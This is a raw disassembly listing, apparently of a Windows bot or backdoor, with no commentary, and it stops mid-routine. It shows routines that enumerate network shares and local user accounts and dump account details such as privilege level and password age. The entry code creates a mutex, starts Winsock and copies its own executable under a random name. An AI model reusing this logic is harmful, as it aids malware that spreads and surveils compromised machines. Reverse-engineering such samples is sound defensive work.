push esi
push esi
mov edi, dword_421158
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test byte_445C88, 1
mov ebp, eax
jnz short loc_40E198
or byte_445C88, 1
lea eax, [ebp+1]
push eax
call sub_418F5C
pop ecx
mov dword_445A28, eax
loc_40E198: ; CODE XREF: sub_40E14E+32�j
push esi
push esi
push ebp
push dword_445A28
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_445A28
pop edi
pop ebp
pop ebx
pop esi
retn
sub_40E14E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E1B5 proc near ; CODE XREF: sub_40E08F+6D�p
; sub_416885+18A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_40E220
push [ebp+arg_4]
mov edi, eax
call sub_40E220
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_418630
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_40E220
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_4412B8
pop edi
leave
retn
sub_40E1B5 endp
; =============== S U B R O U T I N E =======================================
sub_40E220 proc near ; CODE XREF: sub_40E1B5+A�p
; sub_40E1B5+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_40E22D
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40E22D: ; CODE XREF: sub_40E220+9�j
push ebx
push esi
mov esi, dword_421074
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_418F5C
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_40E220 endp
; =============== S U B R O U T I N E =======================================
sub_40E261 proc near ; CODE XREF: sub_40E08F+20�p
; sub_416561+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40E220
push [esp+8+arg_4]
mov esi, eax
call sub_40E220
pop ecx
pop ecx
push 0
push eax
push esi
call dword_441290
pop esi
retn
sub_40E261 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E284 proc near ; CODE XREF: sub_40F6F1+222B�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_40E220
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 18h
loc_40E2BD: ; CODE XREF: sub_40E284+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_441304
mov ebx, eax
cmp ebx, esi
jz short loc_40E320
cmp ebx, 0EAh
jz short loc_40E320
push ebx
push ebx
call sub_40EA39
pop ecx
push eax
lea eax, [ebp+var_210]
push offset unk_42E618
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 24h
jmp short loc_40E38D
; ---------------------------------------------------------------------------
loc_40E320: ; CODE XREF: sub_40E284+5D�j
; sub_40E284+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_40E384
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_40E32E: ; CODE XREF: sub_40E284+FC�j
push dword ptr [esi+10h]
call dword_4412AC ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40E345
mov eax, offset aNo ; "No"
loc_40E345: ; CODE XREF: sub_40E284+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_40E32E
xor esi, esi
loc_40E384: ; CODE XREF: sub_40E284+A2�j
push [ebp+var_4]
call dword_441448
loc_40E38D: ; CODE XREF: sub_40E284+9A�j
cmp ebx, 0EAh
jz loc_40E2BD
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40E284 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E3A5 proc near ; CODE XREF: sub_40F6F1:loc_411992�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_40E449
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_40E3E7
dec eax
jz short loc_40E3DC
dec eax
jnz short loc_40E402
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_40E4EB
add esp, 14h
jmp short loc_40E3FE
; ---------------------------------------------------------------------------
loc_40E3DC: ; CODE XREF: sub_40E3A5+1D�j
push ebx
push edi
call sub_40E4CA
pop ecx
pop ecx
jmp short loc_40E3FE
; ---------------------------------------------------------------------------
loc_40E3E7: ; CODE XREF: sub_40E3A5+1A�j
cmp [ebp+arg_8], edi
jz short loc_40E3FB
push [ebp+arg_8]
push ebx
push edi
call sub_40E470
add esp, 0Ch
jmp short loc_40E3FE
; ---------------------------------------------------------------------------
loc_40E3FB: ; CODE XREF: sub_40E3A5+45�j
push 57h
pop eax
loc_40E3FE: ; CODE XREF: sub_40E3A5+35�j
; sub_40E3A5+40�j ...
cmp eax, edi
jnz short loc_40E422
loc_40E402: ; CODE XREF: sub_40E3A5+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_445C8C
push off_42DEB4[eax*4]
push offset unk_42E700
push esi
call sub_4173AC
add esp, 10h
jmp short loc_40E469
; ---------------------------------------------------------------------------
loc_40E422: ; CODE XREF: sub_40E3A5+5B�j
push eax
call sub_40EA39
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_445C8C
push off_42DEB0[eax*4]
push offset unk_42E6C0
push esi
call sub_4173AC
add esp, 18h
jmp short loc_40E469
; ---------------------------------------------------------------------------
loc_40E449: ; CODE XREF: sub_40E3A5+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_445C8C
lea eax, [eax+eax*2]
push off_42DEB0[eax*4]
push offset unk_42E688
push esi
call sub_4173AC
add esp, 0Ch
loc_40E469: ; CODE XREF: sub_40E3A5+7B�j
; sub_40E3A5+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40E3A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E470 proc near ; CODE XREF: sub_40E3A5+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_40E220
push [ebp+arg_4]
mov edi, eax
call sub_40E220
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_40E220
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_44129C
pop edi
leave
retn
sub_40E470 endp
; =============== S U B R O U T I N E =======================================
sub_40E4CA proc near ; CODE XREF: sub_40E3A5+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40E220
push [esp+8+arg_4]
mov esi, eax
call sub_40E220
pop ecx
pop ecx
push eax
push esi
call dword_44128C
pop esi
retn
sub_40E4CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E4EB proc near ; CODE XREF: sub_40E3A5+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_40E220
push [ebp+arg_4]
mov esi, eax
call sub_40E220
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_441410
test eax, eax
mov [ebp+arg_0], eax
jnz loc_40E878
mov eax, [ebp+var_4]
test eax, eax
jz loc_40E8B3
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_4173AC
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_40E604
dec eax
jz short loc_40E5FD
dec eax
jz short loc_40E5F6
mov eax, offset aUnknown ; "Unknown"
jmp short loc_40E609
; ---------------------------------------------------------------------------
loc_40E5F6: ; CODE XREF: sub_40E4EB+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_40E609
; ---------------------------------------------------------------------------
loc_40E5FD: ; CODE XREF: sub_40E4EB+FF�j
mov eax, offset aUser_0 ; "User"
jmp short loc_40E609
; ---------------------------------------------------------------------------
loc_40E604: ; CODE XREF: sub_40E4EB+FC�j
mov eax, offset aGuest ; "Guest"
loc_40E609: ; CODE XREF: sub_40E4EB+109�j
; sub_40E4EB+110�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40DC10
add esp, 20h
pop edi
pop ebx
jmp short loc_40E8A4
; ---------------------------------------------------------------------------
loc_40E878: ; CODE XREF: sub_40E4EB+35�j
push eax
lea eax, [ebp+var_204]
push offset unk_42E730
push eax
call sub_4173AC
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40DC10
add esp, 20h
loc_40E8A4: ; CODE XREF: sub_40E4EB+38B�j
cmp [ebp+var_4], 0
jz short loc_40E8B3
push [ebp+var_4]
call dword_441448
loc_40E8B3: ; CODE XREF: sub_40E4EB+40�j
; sub_40E4EB+3BD�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_40E4EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E8B9 proc near ; CODE XREF: sub_40F6F1+22CD�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_40E220
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 18h
loc_40E8F8: ; CODE XREF: sub_40E8B9+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_441320
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_40E959
cmp eax, 0EAh
jz short loc_40E959
push eax
push eax
call sub_40EA39
pop ecx
push eax
lea eax, [ebp+var_218]
push offset unk_42E944
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 24h
jmp short loc_40E9D4
; ---------------------------------------------------------------------------
loc_40E959: ; CODE XREF: sub_40E8B9+62�j
; sub_40E8B9+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_40E9E7
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_40E9D4
loc_40E96B: ; CODE XREF: sub_40E8B9+ED�j
cmp edi, esi
jz short loc_40E9AA
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_4 ; " %S"
push eax
call sub_4173AC
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_40E96B
jmp short loc_40E9D4
; ---------------------------------------------------------------------------
loc_40E9AA: ; CODE XREF: sub_40E8B9+B4�j
lea eax, [ebp+var_218]
push offset unk_42E8FC
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 1Ch
loc_40E9D4: ; CODE XREF: sub_40E8B9+9E�j
; sub_40E8B9+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40E9E7
push edi
call dword_441448
xor edi, edi
mov [ebp+var_4], edi
loc_40E9E7: ; CODE XREF: sub_40E8B9+A5�j
; sub_40E8B9+120�j
cmp [ebp+var_C], 0EAh
jz loc_40E8F8
cmp edi, esi
jz short loc_40E9FF
push edi
call dword_441448
loc_40E9FF: ; CODE XREF: sub_40E8B9+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40E8B9 endp
; =============== S U B R O U T I N E =======================================
sub_40EA39 proc near ; CODE XREF: sub_40E08F+41�p
; sub_40E284+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_40EAEB
jz loc_40EAE4
cmp eax, 7Bh
ja short loc_40EAB0
jz short loc_40EAA6
cmp eax, 5
jz short loc_40EA9C
cmp eax, 8
jz short loc_40EA92
cmp eax, 32h
jz short loc_40EA88
cmp eax, 35h
jz short loc_40EA7E
cmp eax, 57h
jnz loc_40EB3A
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EA7E: ; CODE XREF: sub_40EA39+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EA88: ; CODE XREF: sub_40EA39+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EA92: ; CODE XREF: sub_40EA39+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EA9C: ; CODE XREF: sub_40EA39+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EAA6: ; CODE XREF: sub_40EA39+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EAB0: ; CODE XREF: sub_40EA39+1A�j
sub eax, 7Ch
jz short loc_40EADD
sub eax, 7C8h
jz short loc_40EAD6
dec eax
jz short loc_40EACC
dec eax
jnz short loc_40EB3A
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EACC: ; CODE XREF: sub_40EA39+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40EA39+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EADD: ; CODE XREF: sub_40EA39+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EAE4: ; CODE XREF: sub_40EA39+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EAEB: ; CODE XREF: sub_40EA39+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_40EB24
jz short loc_40EB1D
sub eax, 8ADh
jz short loc_40EB4F
dec eax
dec eax
jz short loc_40EB16
dec eax
jz short loc_40EB0F
dec eax
dec eax
jnz short loc_40EB3A
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB0F: ; CODE XREF: sub_40EA39+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB16: ; CODE XREF: sub_40EA39+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB1D: ; CODE XREF: sub_40EA39+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB24: ; CODE XREF: sub_40EA39+B9�j
sub eax, 8CAh
jz short loc_40EB56
sub eax, 17h
jz short loc_40EB4F
sub eax, 25h
jz short loc_40EB48
sub eax, 29h
jz short loc_40EB41
loc_40EB3A: ; CODE XREF: sub_40EA39+35�j
; sub_40EA39+87�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB41: ; CODE XREF: sub_40EA39+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40EA39+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB4F: ; CODE XREF: sub_40EA39+C2�j
; sub_40EA39+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40EB5B
; ---------------------------------------------------------------------------
loc_40EB56: ; CODE XREF: sub_40EA39+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_40EB5B: ; CODE XREF: sub_40EA39+40�j
; sub_40EA39+4A�j ...
push offset dword_445A2C
call sub_4173AC
pop ecx
mov eax, offset dword_445A2C
pop ecx
retn
sub_40EA39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB6D proc near ; CODE XREF: sub_40F6F1+230C�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_417CAE
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
nop
call near ptr 7C8216A4h
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_417CAE
lea eax, [ebp+var_718]
push eax
call sub_417C91
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_4413C8
test eax, eax
jnz short loc_40EBFD
mov esi, offset dword_445828
push offset unk_42EC9C
push esi
call sub_4173AC
pop ecx
pop ecx
jmp short loc_40EC26
; ---------------------------------------------------------------------------
loc_40EBFD: ; CODE XREF: sub_40EB6D+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_40EA39
pop ecx
mov esi, offset dword_445828
push eax
push offset unk_42EC60
push esi
call sub_4173AC
add esp, 14h
loc_40EC26: ; CODE XREF: sub_40EB6D+8E�j
mov eax, esi
pop esi
leave
retn
sub_40EB6D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0A90h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp-8], ebx
mov [ebp-10h], ebx
mov dword ptr [ebp-0Ch], offset sub_40D93C
push dword ptr [ebp-0Ch]
push large dword ptr fs:0
mov large fs:0, esp
cmp dword_42ED68, ebx
jz short loc_40EC64
call sub_40AD3F
loc_40EC64: ; CODE XREF: ___:0040EC5D�j
mov esi, dword_421064
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_5154C0, eax
call esi ; GetTickCount
push eax
call sub_4173FE
pop ecx
call sub_409794
push 2
call dword_441464 ; SetErrorMode
push 7530h
push offset aArra ; "arra"
push ebx
push ebx
nop
call near ptr 7C80E93Fh
push eax
nop
call near ptr 7C802520h
cmp eax, 102h
jnz short loc_40ECB8
push 1
nop
call near ptr 7C81CDDAh
loc_40ECB8: ; CODE XREF: ___:0040ECAE�j
lea eax, [ebp-98Ch]
push eax
push 202h
call dword_441330 ; WSAStartup
cmp eax, ebx
mov [ebp-0Ch], eax
jnz loc_40F31D
cmp byte ptr [ebp-98Ch], 2
jnz loc_40F317
xor eax, eax
mov al, [ebp-98Bh]
cmp al, 2
jnz loc_40F317
mov esi, 104h
lea eax, [ebp-3F4h]
push esi
push eax
nop
call near ptr 7C814EEAh
lea eax, [ebp-2F0h]
push esi
push eax
push ebx
nop
call near ptr 7C80B6A1h
push eax
nop
call near ptr 7C80B4CFh
lea eax, [ebp-6FCh]
push eax
lea eax, [ebp-7FCh]
push eax
push ebx
lea eax, [ebp-2F0h]
push ebx
push eax
call sub_418AA8
lea eax, [ebp-6FCh]
push eax
lea eax, [ebp-7FCh]
push eax
push offset aSS_2 ; "%s%s"
lea eax, [ebp-4F8h]
push esi
push eax
call sub_41792A
lea eax, [ebp-3F4h]
push eax
lea eax, [ebp-2F0h]
push eax
call sub_417980
add esp, 30h
mov esi, offset byte_42EDC4
test eax, eax
jnz loc_40EF33
cmp dword_515630, ebx
jz short loc_40EDB3
push esi
xor edi, edi
call sub_417AF0
sub eax, 4
pop ecx
jz short loc_40EDB3
loc_40ED90: ; CODE XREF: ___:0040EDB1�j
call sub_417408
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov byte_42EDC4[edi], dl
inc edi
call sub_417AF0
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_40ED90
loc_40EDB3: ; CODE XREF: ___:0040ED80�j
; ___:0040ED8E�j
lea eax, [ebp-3F4h]
push esi
push eax
lea eax, [ebp-1ECh]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_4173AC
add esp, 10h
lea eax, [ebp-1ECh]
push eax
nop
call near ptr 7C81153Ch
cmp eax, 0FFFFFFFFh
jz short loc_40EDF3
lea eax, [ebp-1ECh]
push 80h
push eax
nop
call near ptr 7C812782h
loc_40EDF3: ; CODE XREF: ___:0040EDDF�j
mov edi, dword_421130
lea eax, [ebp-1ECh]
push ebx
push eax
lea eax, [ebp-2F0h]
mov [ebp-4], ebx
push eax
loc_40EE0B: ; CODE XREF: ___:0040EE47�j
call edi ; CopyFileA
test eax, eax
jnz short loc_40EE49
nop
call near ptr 7C910331h
cmp [ebp-4], ebx
jnz short loc_40EE49
cmp eax, 20h
